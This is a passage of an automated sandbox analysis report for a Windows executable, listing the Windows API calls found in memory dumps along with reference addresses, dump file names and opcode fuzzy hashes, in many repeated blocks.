  • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
• HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,0018CBE8,001517A1,?,?,?,?,00000000,?,00151378,?,?), ref: 00175B47
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
• API String ID: 2447670028-0
APIs
• LoadStringW.USER32(?,?,00000200,?), ref: 0015D187
• LoadStringW.USER32(?,?,00000200,?), ref: 0015D19D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    • Opcode ID: ccafabfeec3b0ba195b8b5fd30747293422b6e90d8b676aff745160895e69e27
                                                                                    • Instruction ID: 58800ad9bb11825bfd2c3c0a4274758736e040814a484ae39d28430fe4fc5eee
                                                                                    • Opcode Fuzzy Hash: ccafabfeec3b0ba195b8b5fd30747293422b6e90d8b676aff745160895e69e27
                                                                                    • Instruction Fuzzy Hash: 55F0C232702628AFEA20AF50AC85F677A99EF153D6F010425FE949A861D7214E858BE0
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 0015FCB3
                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 0015FCBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                    • String ID:
                                                                                    • API String ID: 1231390398-0
                                                                                    • Opcode ID: 050828051e2d5ce6fff91235e99d800e07168e1c824034f3d4c28392aae76f2e
                                                                                    • Instruction ID: 64301908405d6fd2ba9d283edccde2dbb01f45ac78fa40d81c2695c3d52919ea
                                                                                    • Opcode Fuzzy Hash: 050828051e2d5ce6fff91235e99d800e07168e1c824034f3d4c28392aae76f2e
                                                                                    • Instruction Fuzzy Hash: B1E06D32E0010EEB8B498AA49C04EEA729DEF08242724457EAD27D7600EB34DE4A57A0
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A0D7
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A108
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: b8fabd5782026cb3d05290c44b2ad2429bf4f8d6921f2070fa562f952b0c7e94
                                                                                    • Instruction ID: 7b5e882d8c67746f4ba1c686d4a0446ffeb948b6ca3822e7e52cab49297ac894
                                                                                    • Opcode Fuzzy Hash: b8fabd5782026cb3d05290c44b2ad2429bf4f8d6921f2070fa562f952b0c7e94
                                                                                    • Instruction Fuzzy Hash: 8CF0A03228010DABDF515F60DC41BEA776DBF08382F448061FD989A060DB329AAC9B90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText_swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3011073432-0
                                                                                    • Opcode ID: d294f1971a64e6e2de921668966d94967d03871f4225ab28f551df7e3746f3fa
                                                                                    • Instruction ID: 735c28c280703172f1996b55b609db8753c5e357fb4923d515cf693daf98e6ee
                                                                                    • Opcode Fuzzy Hash: d294f1971a64e6e2de921668966d94967d03871f4225ab28f551df7e3746f3fa
                                                                                    • Instruction Fuzzy Hash: 6BF0EC72554248F7E711B7609C06FE93B2DAB14342F040057F615974E2D7725B709792
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00159611,?,?,0015946C), ref: 00159DBD
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00159611,?,?,0015946C), ref: 00159DEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 6ee3a92abf593502c17f87959273a671aaf0d6ad6bee5ae8380a8d27ff9722d3
                                                                                    • Instruction ID: b4f3bfcaf88c4002827329c2faf20dd7371c9f2047e2f413ce3f0f0522737bf5
                                                                                    • Opcode Fuzzy Hash: 6ee3a92abf593502c17f87959273a671aaf0d6ad6bee5ae8380a8d27ff9722d3
                                                                                    • Instruction Fuzzy Hash: 2BE09B3164010DE7DB115F61DC41BEA77ADEB093C2F844065BD94CA050DB329D989A90
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00159E08,?,001575A0,?,?,?,?), ref: 00159E24
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00159E08,?,001575A0,?,?,?,?), ref: 00159E50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 51d9c904e81abaa06783954eb2e22116f50688e62624473ef1b6fa4f04c14dbe
                                                                                    • Instruction ID: 3d6870ae39bfb131c7319ed5fdf15243ebb1efd9d848e07db3175acd277c30db
                                                                                    • Opcode Fuzzy Hash: 51d9c904e81abaa06783954eb2e22116f50688e62624473ef1b6fa4f04c14dbe
                                                                                    • Instruction Fuzzy Hash: 87E09B3250015897CB51AB68DC05BD9775CDB1C7E2F000161FD68E7190D7715D9C97D0
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1175261203-0
                                                                                    • Opcode ID: d816feb4d38db87458aa05055faa08554d65f7d027fea2a8513fc79eb6b54ed2
                                                                                    • Instruction ID: eb91227d9186ad07e127ec263c8a00627799f07173da27e5a9752c57c19058a8
                                                                                    • Opcode Fuzzy Hash: d816feb4d38db87458aa05055faa08554d65f7d027fea2a8513fc79eb6b54ed2
                                                                                    • Instruction Fuzzy Hash: 94E0127681115CA7DB51AAA49C09FEB776CEB0C3C2F0440A5B948D2015DB749A94CBF0
                                                                                    APIs
                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00168945
                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0016894C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                    • String ID:
                                                                                    • API String ID: 1918208029-0
                                                                                    • Opcode ID: 42264db8ccb11c0ac0cb23701b7df08b3768c0012ec7e37411ed6ce32fd7cecc
                                                                                    • Instruction ID: 5944046be2c33d01e4b0492145d31499e8c6451a53ff1a0cc14bde2dc83241d6
                                                                                    • Opcode Fuzzy Hash: 42264db8ccb11c0ac0cb23701b7df08b3768c0012ec7e37411ed6ce32fd7cecc
                                                                                    • Instruction Fuzzy Hash: CDE06D71801208EFCB10EF88C9017E9BBE8EB08361F10816AE88493200D770AE149BD2
                                                                                    APIs
                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,0017F79B,000000FF), ref: 001690C7
                                                                                    • CoUninitialize.COMBASE(?,?,?,0017F79B,000000FF), ref: 001690CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3856339756-0
                                                                                    • Opcode ID: c4ef99cb75008ab87262faefbe43e342e809fcb035e35688cc24f03592ed66ac
                                                                                    • Instruction ID: 66e70ad70caa7179258f87462c8f2e8f9ed3fa87cc016cc9e347336a4d0b32d7
                                                                                    • Opcode Fuzzy Hash: c4ef99cb75008ab87262faefbe43e342e809fcb035e35688cc24f03592ed66ac
                                                                                    • Instruction Fuzzy Hash: ADE01A32544644AFC314DB8CDD46B56BBE9FB08B20F00876AB81A83B60CB386840CBD1
                                                                                    APIs
                                                                                      • Part of subcall function 00171D9A: try_get_function.LIBVCRUNTIME ref: 00171DAF
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00170CC4
                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00170CCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                    • String ID:
                                                                                    • API String ID: 806969131-0
                                                                                    • Opcode ID: ee687235bab424e887e66d8af289e7db8e23a4092a2562001d809fec5efa3082
                                                                                    • Instruction ID: 68706d107f95654aa0ebecb0fdb63ff400d17359e6ce4240d63df0524767041a
                                                                                    • Opcode Fuzzy Hash: ee687235bab424e887e66d8af289e7db8e23a4092a2562001d809fec5efa3082
                                                                                    • Instruction Fuzzy Hash: 20D0A739548B01A4690723B4681245A2378992AB747A0C3C6E429951C1DF1441816116
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3351165006-0
APIs
• EnterCriticalSection.KERNEL32(00191E74,?,?,?,?,0015A5A0,?,?,?,?,0017F79B,000000FF), ref: 0015FC42
• LeaveCriticalSection.KERNEL32(00191E74,?,?,?,?,0015A5A0,?,?,?,?,0017F79B,000000FF), ref: 0015FC99
  • Part of subcall function 0015F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0015FA05
  • Part of subcall function 0015F9D1: CloseHandle.KERNEL32(?,?), ref: 0015FA1F
  • Part of subcall function 0015F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0015FA38
  • Part of subcall function 0015F9D1: CloseHandle.KERNELBASE(?), ref: 0015FA44
  • Part of subcall function 0015F9D1: CloseHandle.KERNEL32(?), ref: 0015FA50
Similarity
• API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
• String ID:
• API String ID: 3265325312-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00158210
  • Part of subcall function 0015137E: __EH_prolog.LIBCMT ref: 00151383
  • Part of subcall function 0015137E: new.LIBCMT ref: 001513FB
  • Part of subcall function 001519B1: __EH_prolog.LIBCMT ref: 001519B6
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 0016948A
  • Part of subcall function 0015137E: __EH_prolog.LIBCMT ref: 00151383
  • Part of subcall function 0015137E: new.LIBCMT ref: 001513FB
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
  • Part of subcall function 00175A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0017634D,00000001,00000364,?,00172213,?,?,0018CBE8), ref: 00175ACE
• _free.LIBCMT ref: 00178F50
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0017634D,00000001,00000364,?,00172213,?,?,0018CBE8), ref: 00175ACE
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• __EH_prolog.LIBCMT ref: 00155B3A
  • Part of subcall function 0015AC66: __EH_prolog.LIBCMT ref: 0015AC6B
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0015A174
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 1863332320-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151E93
                                                                                      • Part of subcall function 001518F6: __EH_prolog.LIBCMT ref: 001518FB
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151E93
                                                                                      • Part of subcall function 001518F6: __EH_prolog.LIBCMT ref: 001518FB
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 0015F927
                                                                                    Similarity
                                                                                    • API ID: ExecutionStateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2211380416-0
                                                                                    APIs
                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00168B6B
                                                                                      • Part of subcall function 00168924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00168945
                                                                                    Similarity
                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                    • String ID:
                                                                                    • API String ID: 1915507550-0
                                                                                    APIs
                                                                                    • GetFileType.KERNELBASE(000000FF,0015964C), ref: 00159726
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    APIs
                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0016BF9C
                                                                                      • Part of subcall function 0016991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0016992F
                                                                                      • Part of subcall function 0016991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00169940
                                                                                      • Part of subcall function 0016991E: TranslateMessage.USER32(?), ref: 0016994A
                                                                                      • Part of subcall function 0016991E: DispatchMessageW.USER32(?), ref: 00169954
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchItemPeekSendTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4142818094-0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: c54a381d7e2eecbce9ecee3951d4df87962e86c5765067c0fea55d9fe0aa21dc
                                                                                    • Instruction ID: 7013176ef323158280ece3887c07aab7f270cbecba6f6d40ac58780b6216205f
                                                                                    • Opcode Fuzzy Hash: c54a381d7e2eecbce9ecee3951d4df87962e86c5765067c0fea55d9fe0aa21dc
                                                                                    • Instruction Fuzzy Hash: A9B012912981017E3148B1405D42C37110EC7C1B10370C41FB8C0E1040FB804D648972
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: ff3ba188d0b6a2492ba072eecba5ba9751821878a75f484c9e4129515ae11fa0
                                                                                    • Instruction ID: 353cb9404bfa72626065f24660d83bc5124ee87f2778157f1d745aa65838e47f
                                                                                    • Opcode Fuzzy Hash: ff3ba188d0b6a2492ba072eecba5ba9751821878a75f484c9e4129515ae11fa0
                                                                                    • Instruction Fuzzy Hash: D3B012912981056E7148F1455D02C37110DC7C0B10370841FB480D1140FB804D608B76
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 8e38f4171aefb9f5c4f673c52851a1b9ff1e5b803cc84432502971805913f3ec
                                                                                    • Instruction ID: 69f4f250c6bcc119741bee9e973a197acc378ca7397d27353273cd509f7c3d53
                                                                                    • Opcode Fuzzy Hash: 8e38f4171aefb9f5c4f673c52851a1b9ff1e5b803cc84432502971805913f3ec
                                                                                    • Instruction Fuzzy Hash: C1B0129129C0016E3148F1445E02C37110EC7C0B20370841FB4C0D2140FB804D698A72
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
